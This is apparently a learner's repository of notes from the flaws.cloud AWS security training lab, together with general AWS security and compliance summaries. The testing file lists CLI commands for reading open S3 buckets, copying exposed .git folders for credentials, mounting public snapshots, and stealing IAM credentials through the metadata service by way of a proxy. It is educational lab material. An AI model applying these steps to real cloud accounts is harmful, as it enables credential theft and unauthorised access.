├── aws-best-security-practices.txt ├── README.md ├── aws-testing.txt └── aws-security-and-complicance-notes.txt /aws-best-security-practices.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # aws-testing-notes 2 | Notes as I learn basic AWS penetration testing. 3 | I am using http://flaws.cloud/ to learn these common misconfigurations and issues. 4 | This will help me further understand AWS and how AWS security works. 5 | -------------------------------------------------------------------------------- /aws-testing.txt: -------------------------------------------------------------------------------- 1 | 1.) Getting region and type of instance 2 | - Use DNS entries: dig +short flaws.cloud 3 | - query nameserver to get DNS information that gives up the type and region: nslookup IP-FROM-DIG 4 | 5 | 2.) Querying s3 instances 6 | - You can use the API: (aws s3 ls s3://flaws.cloud/ --no-sign-request --region ) 7 | + --no-sign-request: Disables signing requests - creds wont be loaded 8 | 9 | 3.) Look for creds in buckets (left in .git/ quite often) 10 | - If have read & list access I could view the .git/ if there is one. 11 | - (aws s3 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ --recursive) 12 | - To get the git information: (aws s3 cp s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git ./git --recursive) 13 | - Once I have credentials I can create a profile with them: (aws configure --profile flaws) 14 | - Then view all their buckets: (aws --profile flaws s3 ls) 15 | 16 | 4.) Use key to get user information 17 | - Get user info: (aws --profile flaws sts get-caller-identity) 18 | - Is snapshot open to everyone?: (aws ec2 describe-snapshot-attribute --snapshot-id snap-0b49342abd1bdcb89 --attribute createVolumePermission --profile flaws --region ) 19 | - If CreateVolumePemissions has Group: all, then yes we can create a volume out of the snapshot 20 | - Get snapshots from user id: (aws --profile flaws ec2 describe-snapshots --owner-id 975426262029 --region ) 21 | 22 | 5.) Use key to get public snapshot 23 | - Create volume from public snapshot: (aws ec2 create-volume --availability-zone --region --snapshot-id snap-0b49342abd1bdcb89) 24 | - Attach volume to instance: (aws ec2 attach-volume --volume-id vol-0b5715a658be546c5 --instance-id i-058ad74f95e9d9050 --device /dev/sdf) 25 | - SSH in and take a look at the volume (find important files/pwds/keys/src) 26 | 27 | 6.) Get metadata through HTTP proxy on ec2 instance 28 | - AWS has a running instance for metadata at the webserver here: http://169.254.169.254/ 29 | - Use the proxy to request this metadata service to grab security credentials: (http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/) 30 | - Use these creds to access buckets you were not supposed to access! 31 | 32 | 7.) Using the SecurityAudit group can give out lots of information 33 | - Get user information: (aws --profile lvl6 iam get-user) 34 | - Get user policies: (aws --profile lvl6 iam list-attached-user-policies --user-name Level6) 35 | - Get information about a policy: (aws --profile lvl6 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/MySecurityAudit) 36 | - If a policy allows you to list api enpoints you can query different functions that could give off information. 37 | - List lambda functions (aws --profile lvl6 lambda list-functions) 38 | - Query lambda informations (aws --profile lvl6 lambda get-policy --function-name Level6) 39 | - View information of a lambda (aws --profile lvl6 apigateway get-stages --rest-api-id "s33ppypa75") 40 | -------------------------------------------------------------------------------- /aws-security-and-complicance-notes.txt: -------------------------------------------------------------------------------- 1 | Security of the AWS infrastructure 2 | - AWS operates under a shared security responsibility model 3 | - You are responsible for securing workloads you deploy / AWS is responsible for the security of the underlying cloud infrastructure 4 | - This gives you flexibility and agility to implement applicable security controls 5 | - Structure: 6 | You Handle: 7 | + Customer apps & content 8 | ------------------------- 9 | + Network Security 10 | + Inventory & Config 11 | + Data Security 12 | + AC (Access Control) 13 | ------------------------- 14 | AWS Handles: 15 | + AWS Foundation Services 16 | -> Compute 17 | -> Storage 18 | -> Database 19 | -> Networking 20 | ------------------------ 21 | + AWS Global Infrastructure: 22 | -> Availability Zones 23 | -> Regions 24 | -> Edge Locations 25 | 26 | Security Products and Features 27 | - AWS and it's partners offer a wide range of tools for security objectives. 28 | - Network Security 29 | + Built-in firewalls that allow you to create private networks within AWS and control network access to your instances and subnets 30 | + Encryption with TLS across all services 31 | + Connectivity options that enable private or dedicated connections from wherever you are 32 | + DDoS mitigation tech as part of your auto scaling or CDS (Content Delivery Strategy). 33 | - Inventory and Configuration Management 34 | + Deployment tools to manage the creation and decommissioning of AWS resources according to organization standards 35 | + Inventory and config management tools to ID AWS resourcces and then track and manage changes to those resources over time 36 | + Template definition and management tools to create standard, preconfig'd, hardened, VMs for EC2 instances 37 | - Data Encryption 38 | + With encryption you can add an extra layer of security to your cloud data 39 | + Data encryption capabilities available in AWS storage and DB services, like EBS,S#,Glacier,Oracle,Oracle RDS, SQL Server RDS, and Redshift 40 | + Flexible key management options allow the choice to have AWS manage the keys or let you keep control over the keys 41 | + There are also dedicated, hardware-based crytpographic key storage options for customers to help satisfy complicance needs 42 | + Can integrate encryption and data protection for your services you create/deploy using an API 43 | - Access Control 44 | + AWS offers capabilities to define,enforce, and manage user access policies across AWS services 45 | + Identity and access management capabilities to define individual user accounts with permissions across AWS resources 46 | + Multifactor authentication for privileged accounts, including options for hardware-based authenticators 47 | + Integration, and federation, corporate directories to reduce administrative overhead and improve end-user experience 48 | + AWS provides native identity an access management itegration across many services. and API integration with your own apps/services 49 | - Monitoring and Logging 50 | + AWS provides tools and features that let you see whats going on in your environment 51 | -> Deep visibility into API calls, who, what, when, and from where calls are made 52 | -> Log aggregation and options, streamlining investigations and compliance reporting 53 | -> Notifications when events occur or thresholds are exceeded 54 | + These tools and features give the visibility needed to spot issues before they impact businessesand allow you to improve security posture and reduce the risks in your environment 55 | 56 | Security Guidance 57 | - AWS provides customers with guidance and expertise through online tools, resources, support, and professional services provided by AWS and it's partners. 58 | - AWS Trusted Advisor 59 | + An online tool that acts like a customized cloud expert, it helps you configure your resources and help you follow best practices 60 | + It will inspect your AWS environment and help close security gaps. It will even find ways to help you save money, improve system performance, and increase reliability 61 | - AWS Account Teams 62 | + Can help guide through deployment and implmentation, and pointing you toward resources that can help resolve security issues 63 | - AWS Enterprise Support 64 | + Provides 15 minute response time and is available 24/7 by phone, chat, or email. 65 | + You will also have a dedicated Technical Account Manager, this helps ensure customers' issues are addressed swiftly 66 | - AWS Professional Services and AWS Partner Network 67 | + Helps customers develop security policies and procedures based on well-proven designs. 68 | + Ensures customers' security design meets internal and external comliance and requirements. 69 | + The AWS Partner Network has hundreds of certified AWS Consulting Partners worldwide to help customers wih their security and compliance needs 70 | - AWS Advisories and Bulletins 71 | + AWS provides advisories around current vulnerabilities and threats, and enables customers to work with AWS security experts to address concerns like reporting abuse, vulnerabilities, and pentesting 72 | 73 | Compliance 74 | - AWS environments are continually audited to make sure everything is up to standard 75 | - AWS is fully compliant with EU data protection laws 76 | - AWS allows you to take advantage of automated tools like AWS Config and AWS CloudTrail for validating compliance 77 | - These tools can reduce the effort needed to perform audits 78 | --------------------------------------------------------------------------------